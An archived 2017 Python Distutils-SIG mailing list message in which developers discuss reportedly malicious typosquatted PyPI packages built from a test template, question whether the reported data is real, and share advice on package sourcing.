[Distutils] Malicious packages on PyPI

[Xavier Fernandez]

This makes me remember
https://hackernoon.com/building-a-botnet-on-pypi-be1ad280b8d6 on a related
note.

On Thu, Jun 1, 2017 at 7:40 PM, Thomas Kluyver <thomas at kluyver.me.uk> wrote:

> On Thu, Jun 1, 2017, at 06:32 PM, Matt Joyce wrote:
>
> It's basically a test dummy package that reports users who have ran that
> package template.
>
>
> That's what I thought, but all the code to do the upload seems to have
> been removed before s/he built those packages. Now it's just a harmless
> warning, unless I'm missing something.
>
> https://github.com/fate0/cookiecutter-evilpy-package/commit/
> a3ed1e1e060748b0444158ea3bc569dfbf57645e
>
> the site referenced lists the package name that the user ran to get posted
> to the site.   there appear to be many packages in pypi that are built off
> this fatezero template.
>
>
> There *appear* to be, but I checked several of the names listed there, and
> they're not on PyPI:
>
> https://pypi.python.org/pypi/tkinter
> https://pypi.python.org/pypi/memcached
> https://pypi.python.org/pypi/vtk
> https://pypi.python.org/pypi/python-dev
> https://pypi.python.org/pypi/opencv
>
> So I wonder if the data is fake. Or maybe they were already taken down? Or
> the installations are real, but not using those names.
>
> pypi is not a very good package management solution.  most folks I advise
> to build from pypi in CI/CD but push to production via a real package
> management solution such as apt or yum.  always double check sources coming
> from the internet.
>
>
> It's an open repository that anyone can upload to. That has its drawbacks
> and its advantages.
>
>
> _______________________________________________
> Distutils-SIG maillist  -  Distutils-SIG at python.org
> https://mail.python.org/mailman/listinfo/distutils-sig
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/distutils-sig/attachments/20170601/1e0cf3a5/attachment-0001.html>